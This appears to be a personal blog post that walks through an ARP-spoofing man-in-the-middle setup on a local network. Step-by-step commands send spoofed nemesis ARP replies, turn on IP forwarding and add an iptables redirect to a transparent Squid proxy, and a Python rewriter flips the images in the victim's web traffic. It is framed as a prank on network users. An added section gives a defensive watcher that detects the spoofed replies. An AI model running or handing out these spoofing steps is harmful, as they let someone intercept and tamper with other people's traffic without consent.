Weblog entry #1 for johns
The idea comes from http://www.ex-parrot.com/~pete/upside-down-ternet.html, which describes how to have fun with wireless freeloaders by flipping all images requested by their browser (there's a screenshot on the page).
In this article I'm going to describe how to do it in a different way - instead of modifying the gateway, I'm going to use ARP spoofing (also called ARP poisoning) to trick the target box into thinking that my box is the gateway.
(This article assumes that both the attacker and target are on the same private network.)
What are ARP and ARP spoofing anyway?
ARP, or Address Resolution Protocol, is used to translate IP addresses to Ethernet MAC addresses.
The kernel maintains an ARP cache that can be viewed by typing /usr/sbin/arp. When you try to access an IP address that isn't in the cache, an ARP request ("who has <IP>? tell <MAC>") is sent to broadcast. The target computer then sends back an ARP reply ("<IP> is at <MAC>").
ARP is a stateless protocol, so one can easily send a spoofed ARP reply at any time.
For better and more complete descriptions:
Let's start by installing some prerequisites.
If you already have an HTTP server installed, or if you don't want to use thttpd, remove it from the command below.
# apt-get install squid nemesis imagemagick thttpd
Squid is a caching HTTP proxy that has the nice feature of letting one define a script to rewrite URLs. Nemesis will be used for sending fake ARP replies, imagemagick for transforming images, and thttpd for serving transformed images to the proxy server.
# nano /usr/local/bin/squidupsidedown
Copy and paste the following code:
#!/usr/bin/env python3
import os
import re
import subprocess
import sys
import urllib.error
import urllib.request

outdir = '/var/www/squidupsidedown'
wwwpath = 'http://localhost/squidupsidedown'
img_regex = re.compile(r'(?i)\.(jpg|jpeg|png|gif)$')
operation = '-flip'  # mogrify -help for more options
operation = operation.split()
count = 0

# Squid hands the rewriter one request per line ("URL client/fqdn ident method")
# and expects one line back: the original URL or a replacement for it.
for line in sys.stdin:
    fields = line.split()
    if not fields:
        continue
    url = fields[0]
    m = img_regex.search(url)
    if m:
        # Name the local copy by our pid and a counter so parallel rewriters never collide.
        outname = '%d-%d.%s' % (os.getpid(), count, m.group(1))
        outpath = os.path.join(outdir, outname)
        count += 1
        try:
            urllib.request.urlretrieve(url, outpath)
            os.chmod(outpath, 0o644)
            subprocess.call(['mogrify'] + operation + [outpath])
            print('/'.join([wwwpath, outname]))
        except (IOError, urllib.error.ContentTooShortError):
            # Download failed: hand the original URL back unchanged.
            print(url)
    else:
        print(url)
    sys.stdout.flush()
Save the file.
# chmod +x /usr/local/bin/squidupsidedown
# mkdir /var/www/squidupsidedown
# chown proxy /var/www/squidupsidedown
squidupsidedown is a simple squid URL rewriter. Squid URL rewriters are expected to read a URL from stdin and write a (possibly changed) URL to stdout.
In this case, if the URL ends in .jpg/.png/.gif, it is assumed to be an image and is downloaded to /var/www/squidupsidedown and transformed using mogrify. The URL http://localhost/squidupsidedown/pid-count.ext is then passed back to squid, which fetches the transformed copy from thttpd instead of the original.
By default images are flipped, but any operation supported by mogrify (see mogrify -help) can be used.
We have to make a few changes to squid.
# nano /etc/squid/squid.conf
Around line 73:
http_port 3128 transparent
This enables transparent proxying.
Around line 2577 (substitute 192.168.26.0/24 with your network):
acl our_networks src 192.168.26.0/24
http_access allow our_networks
Around line 1464, point squid at the rewriter (the directive is url_rewrite_program in squid 2.6 and later; older releases call it redirect_program):
url_rewrite_program /usr/local/bin/squidupsidedown
Then restart squid:
# invoke-rc.d squid restart
Enable IP forwarding in the kernel. This is necessary so that our box works as a gateway for the target and forwards its non-HTTP traffic on to the real gateway.
# echo 1 > /proc/sys/net/ipv4/ip_forward
Enable transparent proxying. Substitute eth0 with the appropriate network interface.
# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 3128
With all the setup completed, it's time for the attack itself. Define the variables below, where my_macaddr is the MAC address of your (attacking) box, gw_ipaddr is the IP address of the gateway/router, target_macaddr is the MAC address of the target, and target_ipaddr is the IP address of the target.
To get these you can:
* nmap the network (you have to be root to see MAC addresses):
# nmap 192.168.26.1-
* Or if you know the IP address of the target:
$ ping -c 1 192.168.26.103; /usr/sbin/arp
To get your own MAC address type
Send a spoofed ARP reply. For more information on the arguments, type nemesis arp help. Again, substitute eth0 with the appropriate network interface.
# nemesis arp -S $gw_ipaddr -D $target_ipaddr -h $my_macaddr -m $target_macaddr -r -d eth0 -H $my_macaddr -M $target_macaddr
The target will update its ARP cache occasionally. The above command will have to be repeated when it does (you can put the command in a loop).
On the target, type /usr/sbin/arp (Linux) or arp (Windows). If it worked, you should see your own MAC address instead of the gateway MAC address.
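The same change that the arp command shows on the target is what an ARP watcher on the segment looks for. As an added example (not part of the original article), here is a small watcher that parses raw Ethernet/ARP frames, remembers the first MAC seen for each IP (or a pinned gateway entry), and flags a reply that claims the IP for a different MAC, which is exactly the reply the nemesis command above produces. The frames and addresses are constructed inline rather than captured; only the 192.168.26.0/24 range comes from the article.

```python
import socket
import struct
ETH_HDR = struct.Struct('!6s6sH')          # dst MAC, src MAC, ethertype
ARP_PKT = struct.Struct('!HHBBH6s4s6s4s')  # htype, ptype, hlen, plen, oper, sha, spa, tha, tpa
ETHERTYPE_ARP, ARP_REPLY = 0x0806, 2

def mac_str(b):
    return ':'.join('%02x' % x for x in b)

def parse_arp(frame):
    """Return (oper, sender_mac, sender_ip, target_mac, target_ip), or None if not ARP."""
    if len(frame) < ETH_HDR.size + ARP_PKT.size:
        return None
    if ETH_HDR.unpack_from(frame)[2] != ETHERTYPE_ARP:
        return None
    _, _, _, _, oper, sha, spa, tha, tpa = ARP_PKT.unpack_from(frame, ETH_HDR.size)
    return oper, mac_str(sha), socket.inet_ntoa(spa), mac_str(tha), socket.inet_ntoa(tpa)

class ArpWatcher:
    """Remembers the first MAC seen for each IP (or a pinned one) and flags replies that contradict it."""
    def __init__(self, pinned=None):
        self.table = dict(pinned or {})   # ip -> mac; pin the real gateway here on a static network
    def feed(self, frame):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            return None                   # requests and non-ARP frames make no address claim
        _, sha, spa, _, _ = parsed
        known = self.table.setdefault(spa, sha)   # learn on first sight, never overwrite
        if known != sha:
            return 'ARP reply claims %s is at %s, but table says %s' % (spa, sha, known)
        return None

def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Constructed test frame (not captured traffic) in the layout parse_arp expects."""
    smac, tmac = (bytes.fromhex(m.replace(':', '')) for m in (sender_mac, target_mac))
    sip, tip = socket.inet_aton(sender_ip), socket.inet_aton(target_ip)
    return (ETH_HDR.pack(tmac, smac, ETHERTYPE_ARP)
            + ARP_PKT.pack(1, 0x0800, 6, 4, ARP_REPLY, smac, sip, tmac, tip))

GW_MAC, GW_IP = '00:11:22:33:44:01', '192.168.26.1'   # constructed addresses in the article's range
TARGET_MAC, TARGET_IP = '00:11:22:33:44:67', '192.168.26.103'
OTHER_MAC = '00:11:22:33:44:ff'

def demo():
    """The real gateway answers first; then another host claims the gateway's IP."""
    w = ArpWatcher()
    first = w.feed(build_arp_reply(GW_MAC, GW_IP, TARGET_MAC, TARGET_IP))
    second = w.feed(build_arp_reply(OTHER_MAC, GW_IP, TARGET_MAC, TARGET_IP))
    return first, second
```

Because the spoofed reply has to be resent whenever the target's cache expires, a watcher like this keeps firing for as long as the attack runs, which is what makes the pattern easy to alert on.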
When testing remember that the browser caches images. If it doesn't appear to work, visit another page or clear the cache.
(This is my first post on debian-administration, so a brief introduction: My name is John, I'm 19 and a Linux user since 2002. This site has been very useful to me on multiple occasions, and hopefully this will be useful or at least entertaining to someone. Comments are welcome.)